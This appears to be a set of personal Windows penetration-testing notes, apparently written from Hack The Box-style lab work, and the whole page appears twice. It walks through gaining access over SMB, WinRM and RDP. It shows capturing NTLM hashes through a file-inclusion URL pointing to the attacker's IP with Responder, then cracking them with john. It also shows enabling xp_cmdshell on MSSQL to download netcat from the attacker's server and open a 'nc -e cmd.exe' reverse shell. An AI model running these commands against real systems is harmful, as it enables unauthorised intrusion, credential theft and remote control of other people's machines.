Windows PenTest Notes

SMB(Server Message Block) aka Samba

Port: 445
Service name: microsoft-ds
Get list of shares: smbclient -L \\\\<host>
Access a share: smbclient \\\\<host>\\<share>
Commands:
- list directories: ls
- download files: get
- change directories: cd

Post-exploitation

If we get an access to the smbclient as Administrator we can use two options of attack.
- One is by using the Smbclient simple navigation to C$ share with Administrator authorization. smbclient \\\\<IP>\\ADMIN$ -U Administrator OR smbclient \\\\<IP>\\C$ -U Administrator
- The other, PSexec.py from Impacket, involving Impacket installation and common attack surface, big fingerprinting. Since we can access this ADMIN$ share, we will try to use a tool called psexec.py to exploit this misconfiguration & get the interactive system shell. The psexec.py is part of the Impacket framework.
- Impacket is a framework written in Python for working with network protocols. It is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB and MSRPC) the protocol implementation itself. In short, Impacket contains dozens of amazing tools for interacting with windows systems and applications, many of which are ideal for attacking Windows and Active Directory.
- One of the most commonly used tools in impacket is psexec.py . It is named after the utility, PsExec from Microsoft’s Sysinternals suite since it performs the same function of enabling us to execute a fully interactive shell on remote Windows machines.
- PsExec is a portable tool from Microsoft that lets you run processes remotely using any user's credentials. It’s a bit like a remote access program but instead of controlling the computer with a mouse, commands are sent via Command Prompt, without having to manually install client software.
- Like any tool, it’s important to understand how the Impacket's psexec works.
- Impacket creates a remote service by uploading a randomly-named executable on the ADMIN$ share on the remote system and then register it as a Windows service.This will result in having an interactive shell available on the remote Windows system via TCP port 445 .
- Psexec requires credentials for a user with local administrator privileges or higher since reading/writing to the ADMIN$ share is required. Once you successfully authenticate, it will drop you into a NT AUTHORITY\SYSTEM shell.
- impacket-psexec username:password@hostIP

References

RDP(Remote Desktop Protocol)

Old remote access tool that came without encryption by default: telnet
Running in port 3389: ms-wbt-server(Microsoft Remote Display Protocol)
ms-wbt-server is the RDP that allows to access to the windows machine
To access we can use xfreerdp.
Command:
- Specify host: /v:
- Specify user: /u:
- Specify domain: /d:
xfreerdp /v: <host> /d: <domain that nmap gave us> /u: <username>

WinRM(Windows Remote Management)

Windows Remote Management, or WinRM, is a Windows-native built-in remote management protocol that basically uses Simple Object Access Protocol to interact with remote computers and servers, as well as Operating Systems and applications.
WinRM allows the user to :
- Remotely communicate and interface with hosts
- Execute commands remotely on systems that are not local to you but are network accessible.
- Monitor, manage and configure servers, operating systems and client machines from a remote location.
As a pentester, this means that if we can find credentials (typically username and password) for a user who has remote management privileges, we can potentially get a PowerShell shell on the host.
Because PowerShell isn't installed on Linux by default, we'll use a tool called Evil-WinRM which is made for this kind of scenario.
evil-winrm -i <host> -u <user> -p <pass>

NTLM(New Technology Lan Manager)

NTLM is a collection of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. It is a type of single sign-on (SSO) because it allows the user to provide the underlying authentication factor only once, at login. The NTLM authentication process is done in the following way :

The client sends the user name and domain name to the server.
The server generates a random character string, referred to as the challenge.
The client encrypts the challenge with the NTLM hash of the user password and sends it back to the server.
The server retrieves the user password (or equivilent).
The server uses the hash value retrieved from the security account database to encrypt the challenge string. The value is then compared to the value received from the client. If the values match, the client is authenticated. A more detailed explanation of the working of NTLM authentication can be found here.

NTLM vs NTHash vs NetNTMLv2
- The terminology around NTLM authentication is messy, and even pros misuse it from time to time, so let's get some key terms defined:
1. A hash function is a one way function that takes any amount of data and returns a fixed size value. Typically, the result is referred to as a hash, digest, or fingerprint. They are used for storing passwords more securely, as there's no way to convert the hash directly back to the original data (though there are attacks to attempt to recover passwords from hashes, as we'll see later). So a server can store a hash of your password, and when you submit your password to the site, it hashes your input, and compares the result to the hash in the database, and if they match, it knows you supplied the correct password.
2. An NTHash is the output of the algorithm used to store passwords on Windows systems in the SAM database and on domain controllers. An NTHash is often referred to as an NTLM hash or even just an NTLM, which is very misleading / confusing. When the NTLM protocol wants to do authentication over the network, it uses a challenge / response model as described above.
3. A NetNTLMv2 challenge / response is a string specifically formatted to include the challenge and response. This is often referred to as a NetNTLMv2 hash, but it's not actually a hash. Still, it is regularly referred to as a hash because we attack it in the same manner. You'll see NetNTLMv2 objects referred to as NTLMv2, or even confusingly as NTLM.

Capturing NTLM hash from file inclusion

In the PHP configuration file php.ini , "allow_url_include" wrapper is set to "Off" by default, indicating that PHP does not load remote HTTP or FTP URLs to prevent remote file inclusion attacks. However, even if allow_url_include and allow_url_fopen are set to "Off", PHP will not prevent the loading of SMB URLs.
In our case, we can misuse this functionality to steal the NTLM hash.
Now, using the example from this link we can attempt to load a SMB URL, and in that process, we can capture the hashes from the target using Responder.
We start a responder by cloning the repo or if we are in kali already it has the responder installed by default. Then enable SMB packets and disable Http packers in the responder configuration. (It is located at /usr/share/responder/Responder.conf in kali)
sudo responder -I tun0
In the file inclusion vulnerability we will specify our IP like: http://unika.htb/index.php?page=//10.10.14.17/something (10.10.14.17 being the attacker IP, my Ip)
We will receive somthing like this in the responder:

Copy the hash to a file and crack it with john the ripper john --wordlist=~/tools/seclists/Passwords/Leaked-Databases/rockyou.txt hash
After having the credentials for the user that is running the server in this case is Administrator we can use them in winrm to upload a shell into our windows machine.

Microsoft SQL Server

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
Port: 1433
There is a way to connect to the microsoft SQL server throught a tool from Impacket collection, the mssqlclient.
If we got the credentials and the domain we can produce the following command:
- impacket-mssqlclient -windows-auth [[domain/]username[:password]@]<IP>
The next step is to enumerate our role and permissions in the sql database.
We can use this two links:
- https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
After we know that we have high level permissions we can try to execute commands in the target machine throught xp_cmdshell.
Xp_cmdshell is a shell that is disable by default and we can execute commands in the target machien through cmd.
To check if is enable execute: EXEC xp_cmdshell ‘net user’;

To enable:

USE master;
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

To execute commands:

EXEC xp_cmdshell '<command>';

Once we got command execution the next step is to get a reverse shell. For that we need to upload the netcat binary from here.

//We download the binary to our machine then we open a python server
python3 -m http.server

//Then, we open a netcat listener in our machine too
nc -lvnp 4444

//Then in the target machine we will use the powershell to upload the binary
EXEC xp_cmdshell 'powershell -c cd C:\Users\<user>\Downloads; wget http://<my_machine_ip>:8000/nc64.exe -outfile nc64.exe'

//then execute nc in the target machine with a shell being cmd.exe
EXEC xp_cmdshell 'powershell -c cd C://Users/<user>/Downloads; .\nc64.exe -e cmd.exe <my_machine_ip> 4444';

Then enumerate the target machine:

powershell -c wget https://github.com/carlospolop/PEASS-ng/releases/download/20221030/winPEASx64.exe --outfile winpeas.exe

PreviousOther References NextServices Pentest Notes

Last updated 2 years ago

Windows PenTest Notes

SMB(Server Message Block) aka Samba

Port: 445
Service name: microsoft-ds
Get list of shares: smbclient -L \\\\<host>
Access a share: smbclient \\\\<host>\\<share>
Commands:
- list directories: ls
- download files: get
- change directories: cd

Post-exploitation

If we get an access to the smbclient as Administrator we can use two options of attack.
- One is by using the Smbclient simple navigation to C$ share with Administrator authorization. smbclient \\\\<IP>\\ADMIN$ -U Administrator OR smbclient \\\\<IP>\\C$ -U Administrator
- The other, PSexec.py from Impacket, involving Impacket installation and common attack surface, big fingerprinting. Since we can access this ADMIN$ share, we will try to use a tool called psexec.py to exploit this misconfiguration & get the interactive system shell. The psexec.py is part of the Impacket framework.
- Impacket is a framework written in Python for working with network protocols. It is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB and MSRPC) the protocol implementation itself. In short, Impacket contains dozens of amazing tools for interacting with windows systems and applications, many of which are ideal for attacking Windows and Active Directory.
- One of the most commonly used tools in impacket is psexec.py . It is named after the utility, PsExec from Microsoft’s Sysinternals suite since it performs the same function of enabling us to execute a fully interactive shell on remote Windows machines.
- PsExec is a portable tool from Microsoft that lets you run processes remotely using any user's credentials. It’s a bit like a remote access program but instead of controlling the computer with a mouse, commands are sent via Command Prompt, without having to manually install client software.
- Like any tool, it’s important to understand how the Impacket's psexec works.
- Impacket creates a remote service by uploading a randomly-named executable on the ADMIN$ share on the remote system and then register it as a Windows service.This will result in having an interactive shell available on the remote Windows system via TCP port 445 .
- Psexec requires credentials for a user with local administrator privileges or higher since reading/writing to the ADMIN$ share is required. Once you successfully authenticate, it will drop you into a NT AUTHORITY\SYSTEM shell.
- impacket-psexec username:password@hostIP

References

RDP(Remote Desktop Protocol)

Old remote access tool that came without encryption by default: telnet
Running in port 3389: ms-wbt-server(Microsoft Remote Display Protocol)
ms-wbt-server is the RDP that allows to access to the windows machine
To access we can use xfreerdp.
Command:
- Specify host: /v:
- Specify user: /u:
- Specify domain: /d:
xfreerdp /v: <host> /d: <domain that nmap gave us> /u: <username>

WinRM(Windows Remote Management)

Windows Remote Management, or WinRM, is a Windows-native built-in remote management protocol that basically uses Simple Object Access Protocol to interact with remote computers and servers, as well as Operating Systems and applications.
WinRM allows the user to :
- Remotely communicate and interface with hosts
- Execute commands remotely on systems that are not local to you but are network accessible.
- Monitor, manage and configure servers, operating systems and client machines from a remote location.
As a pentester, this means that if we can find credentials (typically username and password) for a user who has remote management privileges, we can potentially get a PowerShell shell on the host.
Because PowerShell isn't installed on Linux by default, we'll use a tool called Evil-WinRM which is made for this kind of scenario.
evil-winrm -i <host> -u <user> -p <pass>

NTLM(New Technology Lan Manager)

NTLM is a collection of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. It is a type of single sign-on (SSO) because it allows the user to provide the underlying authentication factor only once, at login. The NTLM authentication process is done in the following way :

The client sends the user name and domain name to the server.
The server generates a random character string, referred to as the challenge.
The client encrypts the challenge with the NTLM hash of the user password and sends it back to the server.
The server retrieves the user password (or equivilent).
The server uses the hash value retrieved from the security account database to encrypt the challenge string. The value is then compared to the value received from the client. If the values match, the client is authenticated. A more detailed explanation of the working of NTLM authentication can be found here.

NTLM vs NTHash vs NetNTMLv2
- The terminology around NTLM authentication is messy, and even pros misuse it from time to time, so let's get some key terms defined:
1. A hash function is a one way function that takes any amount of data and returns a fixed size value. Typically, the result is referred to as a hash, digest, or fingerprint. They are used for storing passwords more securely, as there's no way to convert the hash directly back to the original data (though there are attacks to attempt to recover passwords from hashes, as we'll see later). So a server can store a hash of your password, and when you submit your password to the site, it hashes your input, and compares the result to the hash in the database, and if they match, it knows you supplied the correct password.
2. An NTHash is the output of the algorithm used to store passwords on Windows systems in the SAM database and on domain controllers. An NTHash is often referred to as an NTLM hash or even just an NTLM, which is very misleading / confusing. When the NTLM protocol wants to do authentication over the network, it uses a challenge / response model as described above.
3. A NetNTLMv2 challenge / response is a string specifically formatted to include the challenge and response. This is often referred to as a NetNTLMv2 hash, but it's not actually a hash. Still, it is regularly referred to as a hash because we attack it in the same manner. You'll see NetNTLMv2 objects referred to as NTLMv2, or even confusingly as NTLM.

Capturing NTLM hash from file inclusion

In the PHP configuration file php.ini , "allow_url_include" wrapper is set to "Off" by default, indicating that PHP does not load remote HTTP or FTP URLs to prevent remote file inclusion attacks. However, even if allow_url_include and allow_url_fopen are set to "Off", PHP will not prevent the loading of SMB URLs.
In our case, we can misuse this functionality to steal the NTLM hash.
Now, using the example from this link we can attempt to load a SMB URL, and in that process, we can capture the hashes from the target using Responder.
We start a responder by cloning the repo or if we are in kali already it has the responder installed by default. Then enable SMB packets and disable Http packers in the responder configuration. (It is located at /usr/share/responder/Responder.conf in kali)
sudo responder -I tun0
In the file inclusion vulnerability we will specify our IP like: http://unika.htb/index.php?page=//10.10.14.17/something (10.10.14.17 being the attacker IP, my Ip)
We will receive somthing like this in the responder:

Copy the hash to a file and crack it with john the ripper john --wordlist=~/tools/seclists/Passwords/Leaked-Databases/rockyou.txt hash
After having the credentials for the user that is running the server in this case is Administrator we can use them in winrm to upload a shell into our windows machine.

Microsoft SQL Server

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
Port: 1433
There is a way to connect to the microsoft SQL server throught a tool from Impacket collection, the mssqlclient.
If we got the credentials and the domain we can produce the following command:
- impacket-mssqlclient -windows-auth [[domain/]username[:password]@]<IP>
The next step is to enumerate our role and permissions in the sql database.
We can use this two links:
- https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
After we know that we have high level permissions we can try to execute commands in the target machine throught xp_cmdshell.
Xp_cmdshell is a shell that is disable by default and we can execute commands in the target machien through cmd.
To check if is enable execute: EXEC xp_cmdshell ‘net user’;

To enable:

USE master;
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

To execute commands:

EXEC xp_cmdshell '<command>';

Once we got command execution the next step is to get a reverse shell. For that we need to upload the netcat binary from here.

//We download the binary to our machine then we open a python server
python3 -m http.server

//Then, we open a netcat listener in our machine too
nc -lvnp 4444

//Then in the target machine we will use the powershell to upload the binary
EXEC xp_cmdshell 'powershell -c cd C:\Users\<user>\Downloads; wget http://<my_machine_ip>:8000/nc64.exe -outfile nc64.exe'

//then execute nc in the target machine with a shell being cmd.exe
EXEC xp_cmdshell 'powershell -c cd C://Users/<user>/Downloads; .\nc64.exe -e cmd.exe <my_machine_ip> 4444';

Then enumerate the target machine:

powershell -c wget https://github.com/carlospolop/PEASS-ng/releases/download/20221030/winPEASx64.exe --outfile winpeas.exe

PreviousOther References NextServices Pentest Notes

Last updated 2 years ago